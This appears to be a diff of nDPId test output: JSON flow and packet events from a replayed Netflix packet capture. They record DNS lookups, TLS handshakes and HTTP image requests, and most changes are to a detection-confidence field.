+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1484319035889,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"thread_ts_msec":1484319035889,"pkt":"AQBef\/\/65JjWH70UCABFAACW0KMAAAERNwrAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1484319036827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1484319036827,"pkt":"gCqoTGHM5JjWH70UCABFAABHX6YAAP8R2KbAqAEHwKgBAeF3ADUAM2aFMVgBAAABAAAAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAQ=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1484319036847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1484319036847,"pkt":"5JjWH70UgCqoTGHMCABFAAB74URAAEAR1dTAqAEBwKgBBwA14XcAZ3RRMViBgAABAAIAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAcAMAAUAAQAAACAAGAVlMzA2NwRkc2NnCmFrYW1haWVkZ2XAIsA3AAEAAQAAABIABGhWYbM="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319036847,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.86.97.179"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319036847,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.86.97.179"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036854,"flow_last_seen":1484319036854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319036854,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1484319036854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319036854,"pkt":"gCqoTGHM5JjWH70UCABFAABAqeJAAEAGBR3AqAEHaFZhs8+VAbsXO1WDAAAAALAC\/\/+GqQAAAgQFtAEDAwUBAQgKH2THJwAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1484319036865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319036865,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwGsuNoVmGzwKgBBwG7z5WR\/xaXFztVhKAScSAP4QAAAgQFtAQCCAoCM2vSH2THJwEDAwU="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1484319036868,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319036868,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UCJAAEAGXunAqAEHaFZhs8+VAbsXO1WEkf8WmIAQEBWfqAAAAQEICh9kxzUCM2vS"} 
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1484319042988,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1484319042988,"pkt":"gCqoTGHM5JjWH70UCABFAABGkh4AAP8Rpi\/AqAEHwKgBAecsADUAMtLh8roBAAABAAAAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQAB"} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1484319043002,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1484319043002,"pkt":"5JjWH70UgCqoTGHMCABFAACG4UVAAEAR1cjAqAEBwKgBBwA15ywAct6B8rqBgAABAAMAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQABwAwABQABAAAAUwAUBWExOTA3BGRzY2cGYWthbWFpwCHANgABAAEAAAAHAAS4GcwZwDYAAQABAAAABwAEuBnMCg=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319043002,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.25"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319043002,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.25"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043012,"flow_last_seen":1484319043012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043012,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1484319043012,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043012,"pkt":"gCqoTGHM5JjWH70UCABFAABA10xAAEAGHYnAqAEHuBnMGc+cAFC2IFmCAAAAALAC\/\/8TjwAAAgQFtAEDAwUBAQgKH2TelwAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043013,"flow_last_seen":1484319043013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043013,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -120,68 +120,68 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz53Qk2dE1OOFkqAScSD1lgAAAgQFtAQCCAr\/\/DsiH2TemAEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1484319043041,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043041,"pkt":"gCqoTGHM5JjWH70UCABFAAA0zhNAAEAGJs7AqAEHuBnMGc+cAFC2IFmDcAwqOIAQEBVtuwAAAQEICh9k3rb\/\/Dsd"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1484319043042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043042,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UPZAAEAGo+vAqAEHuBnMGc+dAFDU44WS0JNnRYAQEBWFTgAAAQEICh9k3rb\/\/Dsi"} 
-00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 
